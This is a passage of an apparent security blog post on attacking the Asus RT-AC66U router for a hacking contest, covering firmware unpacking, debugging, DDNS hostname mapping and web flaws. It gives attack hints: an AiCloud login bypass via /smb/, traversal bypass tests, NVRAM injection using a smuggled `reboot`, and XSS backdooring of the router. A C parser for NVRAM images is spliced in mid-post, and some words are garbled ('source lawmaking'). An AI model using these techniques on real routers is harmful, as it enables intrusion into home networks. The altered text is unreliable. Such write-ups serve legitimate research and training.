configurations and specific information. If you want to score lots of points, you should be targeting default services and processes.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-iYIexFmeBy4/U8LACGtuJwI/AAAAAAAAAeg/yhKoXPP6Bvc/s1600/ps.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-iYIexFmeBy4/U8LACGtuJwI/AAAAAAAAAeg/yhKoXPP6Bvc/s1600/ps.PNG" height="330" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div>The USB Application tab on the RT-AC66U allows the user to set up a series of services like FTP, DLNA, NFS and Samba:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-0qykYBza9cA/U8K_8r5LPQI/AAAAAAAAAeU/2TU5c0BS_oc/s1600/media.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-0qykYBza9cA/U8K_8r5LPQI/AAAAAAAAAeU/2TU5c0BS_oc/s1600/media.PNG" height="272" width="400" /></a></div><br />MiniDLNA is also a nice target.
It should be pretty easy to find vulns for the service using <a href="https://twitter.com/zcutlip">Zachary Cutlip</a>'s <a href="http://shadow-file.blogspot.com.br/2014/05/infiltrate-2014.html">research</a>, as he has hit it multiple times.<br /><br /><a href="http://4.bp.blogspot.com/-wQ31rqFoSAM/U8XL7hTeLLI/AAAAAAAAAiQ/h8GxfHo6qMM/s1600/diff.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" src="http://4.bp.blogspot.com/-wQ31rqFoSAM/U8XL7hTeLLI/AAAAAAAAAiQ/h8GxfHo6qMM/s1600/diff.png" height="363" width="640" /></a><br /><br />Another <strike>potentially</strike> vulnerable service is AiCloud: it links your home network to an online Web storage service and lets you access it through a mobile application:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-wcURvLXQEhs/U8R5RdeRBDI/AAAAAAAAAes/gAHXtljWVBQ/s1600/aicloud.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-wcURvLXQEhs/U8R5RdeRBDI/AAAAAAAAAes/gAHXtljWVBQ/s1600/aicloud.PNG" height="330" width="400" /></a></div><br /><b>forensic</b><br /><br />While part of the team audits the source code, the forensics guys should be unpacking the firmware using binwalk + fmk:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-FEc5AIge3Yk/U8SLJW9df6I/AAAAAAAAAe8/vZRu4RgGwrA/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-FEc5AIge3Yk/U8SLJW9df6I/AAAAAAAAAe8/vZRu4RgGwrA/s1600/1.png" height="138" width="400" /></a></div><br />You may remember <a href="https://github.com/bmaia/binwally">binwally</a>, the tool I developed to <a href="http://w00tsec.blogspot.com/2013/12/binwally-directory-tree-diff-tool-using.html">perform binary tree diffing using fuzzy hashing</a>. Binwalk has its own option to <a href="https://github.com/devttys0/binwalk/blob/master/src/binwalk/modules/hashmatch.py">perform fuzzy hashing against files and directories</a>:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/--qerSGlsoCo/U8SLMzWKVnI/AAAAAAAAAfE/3V1fdYQR9l0/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/--qerSGlsoCo/U8SLMzWKVnI/AAAAAAAAAfE/3V1fdYQR9l0/s1600/2.png" height="250" width="400" /></a></div><br />Most vendors (like Asus) won't open source their entire code base. You may need to reverse proprietary drivers and binary blobs in order to find some good vulns. ACSD is a particularly interesting binary because it was removed from newer firmwares (v3.0.0.4.374.130+) due to a <a href="http://infosec42.blogspot.com/2013/07/exploit-asus-rt-ac66u-remote-root.html">vuln</a> disclosed by <a href="https://twitter.com/rootHak42">Jacob Holcomb</a>:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-OsJZw4CSdzM/U8IBgxOzDAI/AAAAAAAAAdc/UqNMQO97yoE/s1600/rem.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-OsJZw4CSdzM/U8IBgxOzDAI/AAAAAAAAAdc/UqNMQO97yoE/s1600/rem.png" height="140" width="400" /></a></div><br />The binaries are MIPS and Little Endian:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-Hq-8hd6sQH8/U8H1KPl_CWI/AAAAAAAAAcc/mUIJGKxNUU8/s1600/Screenshot+from+2014-07-12+23%255E%252554%255E%252541.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-Hq-8hd6sQH8/U8H1KPl_CWI/AAAAAAAAAcc/mUIJGKxNUU8/s1600/Screenshot+from+2014-07-12+23%255E%252554%255E%252541.png" height="232" width="400" /></a></div><br />It's also important to learn more about the filesystem. The OpenWRT Wiki has a nice <a href="http://wiki.openwrt.org/doc/techref/flash.layout">article on Flash Layouts</a>. The <a href="https://en.wikipedia.org/wiki/Memory_Technology_Device">MTD subsystem</a> for Linux provides access to flash devices, creating&nbsp;fully functional filesystems. SSH to the device and map the mount points and partitions:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-iyqGikqZwjQ/U8SOq7Dh_fI/AAAAAAAAAfQ/L52mPUOf3m0/s1600/fs.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-iyqGikqZwjQ/U8SOq7Dh_fI/AAAAAAAAAfQ/L52mPUOf3m0/s1600/fs.PNG" height="212" width="400" /></a></div><br />The NVRAM partition is very valuable for us because it stores all the configuration parameters. We can view its content by dumping the respective partition (mtd1) or by issuing the "<i>nvram show</i>" command:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-920-ai-sPGE/U8SSMlYLz_I/AAAAAAAAAfw/5ydBWlX6XBg/s1600/dd1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-920-ai-sPGE/U8SSMlYLz_I/AAAAAAAAAfw/5ydBWlX6XBg/s1600/dd1.PNG" height="85" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-OI2GwR1aTCs/U8SSR-hZznI/AAAAAAAAAf4/-Qu8A35E5jw/s1600/dd2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-OI2GwR1aTCs/U8SSR-hZznI/AAAAAAAAAf4/-Qu8A35E5jw/s1600/dd2.PNG" height="156" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div>Another interesting partition is the bootloader (pmon).
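What the mtd1 dump looks like on disk, as an added example that is not from the original post: a parser for the Broadcom NVRAM image format (the 20-byte header from bcmnvram.h, then NUL-separated key=value strings ended by an empty string). The sample image it builds uses placeholder values, not data from a real router, and the CRC byte in the header is read but not verified.

```c
#include <stdint.h>
#include <string.h>

/* Layout of a Broadcom NVRAM image as found at the start of the partition
 * (struct nvram_header in bcmnvram.h): five little-endian 32-bit words
 * (magic, len, crc_ver_init, config_refresh, config_ncdl), then "key=value"
 * strings separated by NUL and ended by an empty string. len covers header
 * and data, so the image is usually shorter than the mtd dump around it. */
#define NVRAM_MAGIC   0x48534C46u   /* reads as the bytes "FLSH" */
#define NVRAM_HDR_LEN 20
#define NVRAM_MAX_STR 128

struct nvram_var {
    char key[NVRAM_MAX_STR];
    char val[NVRAM_MAX_STR];
};

struct nvram_info {
    uint32_t len;       /* header + data, in bytes */
    uint8_t  version;   /* bits 8..15 of crc_ver_init */
    uint8_t  crc;       /* bits 0..7 of crc_ver_init; not verified here */
};

static uint32_t rd32le(const uint8_t *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

static void wr32le(uint8_t *p, uint32_t v) {
    p[0] = (uint8_t)v;         p[1] = (uint8_t)(v >> 8);
    p[2] = (uint8_t)(v >> 16); p[3] = (uint8_t)(v >> 24);
}

/* Parse an image into out. Returns the variable count, or -1 when the
 * magic, the declared length or an entry is malformed. */
int nvram_parse(const uint8_t *img, size_t img_len, struct nvram_info *info,
                struct nvram_var *out, int max_vars) {
    if (img_len < NVRAM_HDR_LEN || rd32le(img) != NVRAM_MAGIC) return -1;
    uint32_t len = rd32le(img + 4);
    if (len < NVRAM_HDR_LEN || len > img_len) return -1;
    uint32_t cvi = rd32le(img + 8);
    if (info) {
        info->len = len;
        info->version = (uint8_t)((cvi >> 8) & 0xff);
        info->crc = (uint8_t)(cvi & 0xff);
    }
    size_t pos = NVRAM_HDR_LEN;
    int n = 0;
    while (pos < len && img[pos] != '\0') {          /* empty string ends the list */
        const uint8_t *entry = img + pos;
        const uint8_t *nul = memchr(entry, '\0', len - pos);
        if (nul == NULL) return -1;                  /* entry runs past len */
        size_t elen = (size_t)(nul - entry);
        const uint8_t *eq = memchr(entry, '=', elen);
        if (eq == NULL || eq == entry) return -1;    /* every entry is key=value */
        size_t klen = (size_t)(eq - entry), vlen = elen - klen - 1;
        if (klen >= NVRAM_MAX_STR || vlen >= NVRAM_MAX_STR || n >= max_vars)
            return -1;
        memcpy(out[n].key, entry, klen);  out[n].key[klen] = '\0';
        memcpy(out[n].val, eq + 1, vlen); out[n].val[vlen] = '\0';
        n++;
        pos += elen + 1;
    }
    return n;
}

const char *nvram_lookup(const struct nvram_var *vars, int n, const char *key) {
    for (int i = 0; i < n; i++)
        if (strcmp(vars[i].key, key) == 0) return vars[i].val;
    return NULL;
}

/* Constructed sample image (placeholder values, not from a real router)
 * so the parser can be exercised without a dump. Returns the image length. */
size_t build_sample_image(uint8_t *buf, size_t cap) {
    static const char *entries[] = {
        "wps_device_pin=12345670", "secret_code=1234", "lan_ipaddr=192.168.1.1"
    };
    size_t pos = NVRAM_HDR_LEN;
    for (size_t i = 0; i < sizeof entries / sizeof entries[0]; i++) {
        size_t l = strlen(entries[i]) + 1;          /* include the NUL */
        if (pos + l + 1 > cap) return 0;
        memcpy(buf + pos, entries[i], l);
        pos += l;
    }
    buf[pos++] = '\0';                              /* list terminator */
    memset(buf, 0, NVRAM_HDR_LEN);
    wr32le(buf, NVRAM_MAGIC);
    wr32le(buf + 4, (uint32_t)pos);
    wr32le(buf + 8, 1u << 8);                       /* version 1, crc left 0 */
    return pos;
}
```

Feeding the parser a whole mtd1 dump works the same way: it reads the declared length from the header and ignores the padding after it.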
The bootloader has some LZMA compressed data and the boot process provides a failsafe mechanism to recover from a bad flash.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-kSYjDPsCdso/U8SWIUPVcLI/AAAAAAAAAgE/zf4JlplNROE/s1600/x1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-kSYjDPsCdso/U8SWIUPVcLI/AAAAAAAAAgE/zf4JlplNROE/s1600/x1.png" height="273" width="400" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-g3KY4kojHcg/U8SWId0R5MI/AAAAAAAAAgI/Z0-sDvUI1HA/s1600/x2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-g3KY4kojHcg/U8SWId0R5MI/AAAAAAAAAgI/Z0-sDvUI1HA/s1600/x2.png" height="333" width="400" /></a></div><br /><b>reverse</b><br /><div><b><br /></b>Time to start the reversing tasks. We need some basic tools like gdb, gdbserver and strace to start debugging the binaries: we could either cross compile them or set up&nbsp;<a href="https://github.com/RMerl/asuswrt-merlin/wiki/Entware">Optware/Entware</a>&nbsp;to install prebuilt packages.<br /><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-KUsSUBQISOc/U8IJhskaX7I/AAAAAAAAAds/HIJ2y778pbY/s1600/gdb.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-KUsSUBQISOc/U8IJhskaX7I/AAAAAAAAAds/HIJ2y778pbY/s1600/gdb.PNG" height="220" width="400" /></a></div><div><br />Wanduck (GPL_RT_AC66U_VER3004266/asuswrt/release/src/router/rc/wanduck.c) is an interesting process to analyze. It starts by default and binds a pseudo HTTP server on port 18017. The HTTP server redirects every request to the main administrative interface and, for some reason, it drops requests to URLs ending with ".ico".<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-xCZ-gBnPqzQ/U8SkvxRMsyI/AAAAAAAAAgc/wF5HPBSEQ8o/s1600/wando1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-xCZ-gBnPqzQ/U8SkvxRMsyI/AAAAAAAAAgc/wF5HPBSEQ8o/s1600/wando1.png" height="321" width="400" /></a></div><br />Let's find out why: start gdbserver on the remote target (gdbserver --multi localhost:12345 &amp;) and connect to your debugger of choice. If you're using Ida Pro, open the binary "/sbin/wanduck" and set the processor type to "mipsrl".<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-mDpl8DfWr9o/U8SwAePeagI/AAAAAAAAAhQ/6TkI52piFbc/s1600/gdb2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-mDpl8DfWr9o/U8SwAePeagI/AAAAAAAAAhQ/6TkI52piFbc/s1600/gdb2.PNG" height="95" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div>Navigate to the&nbsp;<i>handle_http_req</i>&nbsp;function and set a breakpoint on the <i>dst_url </i>comparison:<br /><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-DMkLVIItF_U/U8Ss-lPl1MI/AAAAAAAAAg0/JXkonXDuCc4/s1600/wandox.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-DMkLVIItF_U/U8Ss-lPl1MI/AAAAAAAAAg0/JXkonXDuCc4/s1600/wandox.png" height="435" width="640" /></a></div><div><br /></div><div>Enter the gdbserver's host and port under "Debugger / Process Options" and attach to the respective PID.</div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-Iy-d4aCzOyM/U8SttUVo9jI/AAAAAAAAAhA/J3LtPe_xUIY/s1600/wando3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-Iy-d4aCzOyM/U8SttUVo9jI/AAAAAAAAAhA/J3LtPe_xUIY/s1600/wando3.PNG" height="144" width="320" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-G30Z95_Mvdo/U8SttI5j-9I/AAAAAAAAAg8/X5-NCZjMSOE/s1600/wando4.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-G30Z95_Mvdo/U8SttI5j-9I/AAAAAAAAAg8/X5-NCZjMSOE/s1600/wando4.PNG" height="94" width="320" /></a></div><br />Resume the process (F9) and make an HTTP request to http://192.168.1.1/x.ico. The debugger will stop at the specified breakpoint and you can now inspect the registers and the memory.<br /><br /><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-yRqYbeflB3E/U8Sxnnz9fUI/AAAAAAAAAhg/cEXDC0MUXrc/s1600/ida.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-yRqYbeflB3E/U8Sxnnz9fUI/AAAAAAAAAhg/cEXDC0MUXrc/s1600/ida.png" height="320" width="640" /></a></div><br />If you want to find reverse engineering targets, search for folders named "<i>prebuilt</i>" under "GPL_RT_AC66U_VER3004266/asuswrt/release/src/router/". Some interesting binaries:<br /><br />- /acsd/prebuilt/acsd<br />-&nbsp;/webdav_client/prebuilt/webdav_client<br />-&nbsp;/asuswebstorage/prebuilt/asuswebstorage<br />-&nbsp;/eapd/linux/prebuilt/eapd<br />-&nbsp;/nas/nas/prebuilt/nas<br />-&nbsp;/flash/prebuilt/flash<br />-&nbsp;/et/prebuilt/et<br />-&nbsp;/wps/prebuilt/wps_monitor<br />-&nbsp;/ated/prebuilt/ated<br />-&nbsp;/wlconf/prebuilt/wlconf<br /><br />The mobile AiCloud app might reveal some interesting information about how the device works.
If you reverse the APK or use an intercepting proxy you can identify the app's initial HTTP request:<br /><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-ZiNm2dt9Ljg/U8S7ESFewQI/AAAAAAAAAiA/z876Z_hWkW8/s1600/aix2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-ZiNm2dt9Ljg/U8S7ESFewQI/AAAAAAAAAiA/z876Z_hWkW8/s1600/aix2.png" height="320" width="192" /></a>&nbsp;<a href="http://1.bp.blogspot.com/-RjgFOaXIO7g/U8S64LqMy4I/AAAAAAAAAh4/Hhu2-hhjJKw/s1600/aix.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-RjgFOaXIO7g/U8S64LqMy4I/AAAAAAAAAh4/Hhu2-hhjJKw/s1600/aix.png" height="320" width="192" /></a></div><div><br /></div><a href="http://2.bp.blogspot.com/-PIisJx8PT7k/U8S4oHh9WhI/AAAAAAAAAhs/8rj3_K9BzB8/s1600/aicl.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-PIisJx8PT7k/U8S4oHh9WhI/AAAAAAAAAhs/8rj3_K9BzB8/s1600/aicl.png" height="240" width="640" /></a></div><div><br /></div><div>You see that strange <i>ddns_hostname</i>? That's a crypto task =)</div><div><br /></div><b>crypto</b><br /><br />The POST request tries to register a new Dynamic DNS using the asuscomm.com service. &nbsp;If we search for the term <i>asuscomm.com</i> in the RT-AC66U source code, we can easily find the function that generates this DDNS:<br /><br /><script src="https://gist.github.com/bmaia/5bad1648d4b2b9a54063.js"></script>According to <a href="https://wikidevi.com/wiki/ASUS_RT-AC66U">WikiDevi</a>, the following OUIs are currently being used by the RT-AC66U:<br /><br />- 08:60:6E (1 E, 1 W, 2011)<br />-&nbsp;10:BF:48 (1 E, 2 W, 2011)<br />-&nbsp;30:85:A9 (3 E, 3 W, 2011)<br />-&nbsp;50:46:5D (1 E, 2 W, 2012)<br /><br />Using this information we can map the IP address of every single router using AiCloud. Let's generate a list of all the possible MAC addresses and brute force the hostnames using <a href="http://www.room362.com/blog/2014/01/29/hostname-bruteforcing-on-the-cheap/">this cool trick</a> from <a href="https://twitter.com/mubix">mubix</a>.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-LWWxFquAFck/U8XaiKbybJI/AAAAAAAAAig/m7jEhc8-0CI/s1600/dns1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-LWWxFquAFck/U8XaiKbybJI/AAAAAAAAAig/m7jEhc8-0CI/s1600/dns1.png" height="262" width="400" /></a></div><br />If you're too lazy to run these commands, you can simply search for <i>asuscomm.com</i> on&nbsp;<a href="http://www.shodanhq.com/">Shodan</a>:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-rPvyOwpTtwI/U8Xbnd8yDwI/AAAAAAAAAis/9jZ_xirruJw/s1600/shodan.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-rPvyOwpTtwI/U8Xbnd8yDwI/AAAAAAAAAis/9jZ_xirruJw/s1600/shodan.png" height="256" width="400" /></a></div><br />AiCloud runs on ports 8082 and 443 by default. The fact that anyone can easily map the routers running this service could be very worrisome,&nbsp;<a href="http://www.securityfocus.com/archive/1/526942">right</a>?<br /><br />Another interesting crypto exercise is to reverse the algorithm used to generate the WPS device PIN. You can view the current PIN and secret_code by issuing the&nbsp;following command:&nbsp;<i>nvram show | grep -E "secret_code|wps_device_pin"</i>.
Search for these variables in the source lawmaking and use this information to create you own WPS Keygen (don't forget to include a chiptune from <a href="http://pouet.net/">pouet.net</a>).<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-NUSQsHW1Df4/U8Xf1oh-HMI/AAAAAAAAAi4/OdvnIaO7AEM/s1600/search.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-NUSQsHW1Df4/U8Xf1oh-HMI/AAAAAAAAAi4/OdvnIaO7AEM/s1600/search.PNG" height="153" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-lR23JSUls-U/U8Xf5UgjxlI/AAAAAAAAAjA/_etmFYePDyI/s1600/generate.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-lR23JSUls-U/U8Xf5UgjxlI/AAAAAAAAAjA/_etmFYePDyI/s1600/generate.PNG" height="276" width="640" /></a></div><br />You can moreover test the entropy from the crypto keys generated by the device.Trammelsthe slides from the "<a href="http://events.ccc.de/congress/2013/Fahrplan/system/attachments/2226/original/Scanning-30c3-13.pdf">Fast Internet-wide Scanning and its Security Applications</a>" to gather some ideas:<br /><br /><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://4.bp.blogspot.com/-QEdQ7sANjIE/U8ION_-EpcI/AAAAAAAAAd4/hdS2PPgCLtU/s1600/crypto.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="http://4.bp.blogspot.com/-QEdQ7sANjIE/U8ION_-EpcI/AAAAAAAAAd4/hdS2PPgCLtU/s1600/crypto.PNG" height="271" width="400" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Slides from&nbsp;<a href="https://www.youtube.com/watch?v=K47MZIEXQEI">Fast 
Internet-wide Scanning and its Security Applications [30c3]</a></td></tr></tbody></table><b>web</b><br /><br />There are so many things to test on the web application that I'll focus on a few different approaches. The router's administrative interface has no CSRF protection. It has the traditional ping command injection and lots of XSS vectors.<br /><br />The HTTP daemon is based on microhttpd. It has some basic Directory Traversal Protection on httpd.c:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-MpWpjryIjoQ/U8cvpmeCtZI/AAAAAAAAAkw/ltr3s46Lcyc/s1600/trav1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-MpWpjryIjoQ/U8cvpmeCtZI/AAAAAAAAAkw/ltr3s46Lcyc/s1600/trav1.PNG" height="139" width="640" /></a></div><br />We can shamelessly steal <a href="https://twitter.com/hackerfantastic">hackerfantastic</a>'s <a href="http://www.exploit-db.com/download_pdf/18094/">idea</a> and test for potential bypasses (there's an extensive <a href="https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/JHADDIX_LFI.txt">list of LFI tests</a> at <a href="https://github.com/danielmiessler/SecLists">Seclists</a>):<br /><br /><script src="https://gist.github.com/bmaia/bb787f8092a3a54303c0.js"></script><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-ZeAd-jQzVZU/U8XpWV_acdI/AAAAAAAAAjQ/9O7bmIMf_AE/s1600/traversal.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-ZeAd-jQzVZU/U8XpWV_acdI/AAAAAAAAAjQ/9O7bmIMf_AE/s1600/traversal.png" height="261" width="400" /></a></div><br />The web server has some mime handler exceptions that were "supposed to be removed":<br /><br /><script src="https://gist.github.com/bmaia/08e9d6f8dffa84d8bf81.js"></script> get_webdavInfo.asp is accessible without authentication and displays lots of sensitive information 
from the device and the network:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-foKCR53tK-U/U8XvNeGj_5I/AAAAAAAAAjg/DV867YQyA1c/s1600/printe.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-foKCR53tK-U/U8XvNeGj_5I/AAAAAAAAAjg/DV867YQyA1c/s1600/printe.PNG" height="116" width="400" /></a></div><br />We can modify the nvram variables used to display this page and backdoor the router with an XSS payload, for example.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-xoMHBY25H_g/U8XxAnlpNyI/AAAAAAAAAjs/DTDd-mmiqjs/s1600/xss.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-xoMHBY25H_g/U8XxAnlpNyI/AAAAAAAAAjs/DTDd-mmiqjs/s1600/xss.PNG" height="231" width="400" /></a></div><br />Some sensitive operations use the <i>nvram_get</i> and <i>nvram_safe_get</i> functions. Some settings are stored using the <i>nvram_set</i> function. If the router does not sanitize the data being stored in and retrieved from the NVRAM, you may perform some kind of NVRAM Injection (remember, 00, %0A, %0D and `reboot` are always there for you).<br /><br />AiCloud is a *very* vulnerable service that can be <a href="http://www.securityfocus.com/archive/1/526942">easily exploited</a> too. When you activate the service, the router starts a lighttpd daemon on port 8082 (or 443 on newer firmwares) and offers the option to share your files online. 
The only caveat is that the username and password screen can be bypassed by visiting the /smb/ URL (read the source, Luke):<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-nKXc5IDsNrw/U8cl9TCCmsI/AAAAAAAAAj8/a06emTmRO_w/s1600/ai1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-nKXc5IDsNrw/U8cl9TCCmsI/AAAAAAAAAj8/a06emTmRO_w/s1600/ai1.PNG" height="300" width="320" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-nQpJORCc0CI/U8cl9SFR9yI/AAAAAAAAAkA/28Zu6nD5nPw/s1600/ai2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-nQpJORCc0CI/U8cl9SFR9yI/AAAAAAAAAkA/28Zu6nD5nPw/s1600/ai2.PNG" height="295" width="400" /></a></div><br />I wrote a simple AiCloud crawler that exploits this bug on RT-AC66U v3.0.0.4.266. It lists all the files/paths from the router (including the attached USB devices).<br /><br /><script src="https://gist.github.com/bmaia/9a811b1e9f58e31814d5.js"></script><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-FwEsPtsZOHA/U8cmUp22juI/AAAAAAAAAkU/k7lZCx9zqXo/s1600/x1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-FwEsPtsZOHA/U8cmUp22juI/AAAAAAAAAkU/k7lZCx9zqXo/s1600/x1.png" height="262" width="400" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-K1HpUJ9w4ck/U8cmT4s4HsI/AAAAAAAAAkM/BhjJCDxYkc8/s1600/x2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-K1HpUJ9w4ck/U8cmT4s4HsI/AAAAAAAAAkM/BhjJCDxYkc8/s1600/x2.png" height="97" width="400" /></a></div><br />Last, but not least, don't forget to compare the differences between the files in the <i>www</i> directory. 
This path stores all the web components and scripts used by the web application.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-M0aTvrdkZcA/U8cojRgHHCI/AAAAAAAAAkg/OgIyAanXkDA/s1600/www.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-M0aTvrdkZcA/U8cojRgHHCI/AAAAAAAAAkg/OgIyAanXkDA/s1600/www.png" height="227" width="400" /></a></div><b><br /></b><b>bonus</b><br /><b><br /></b>Why not try to open the hardware case without voiding the warranty seal? You may need some tips from the guys at the <a href="http://defcne.net/villages/22/17">DEFCON Tamper Evident Village</a>.<br /><b><br /></b><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-6GPIdP0EoMc/U8K8s4Dn9eI/AAAAAAAAAeI/Zh6K4WAScPk/s1600/tamper.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-6GPIdP0EoMc/U8K8s4Dn9eI/AAAAAAAAAeI/Zh6K4WAScPk/s1600/tamper.png" height="400" width="348" /></a></div><br /><br /><b>misc (a.k.a. Conclusion)</b><br /><br />Hacking the Asus RT-AC66U is a very good exercise for newcomers to router hacking. Most of its source code is available online and we can easily find lots of exploits and advisories for it. You may not have noticed, but we tested every single category of the <a href="https://www.owasp.org/index.php/OWASP_Internet_of_Things_Top_Ten_Project#tab=OWASP_Internet_of_Things_Top_10_for_2014">OWASP Internet of Things Top 10</a>. 
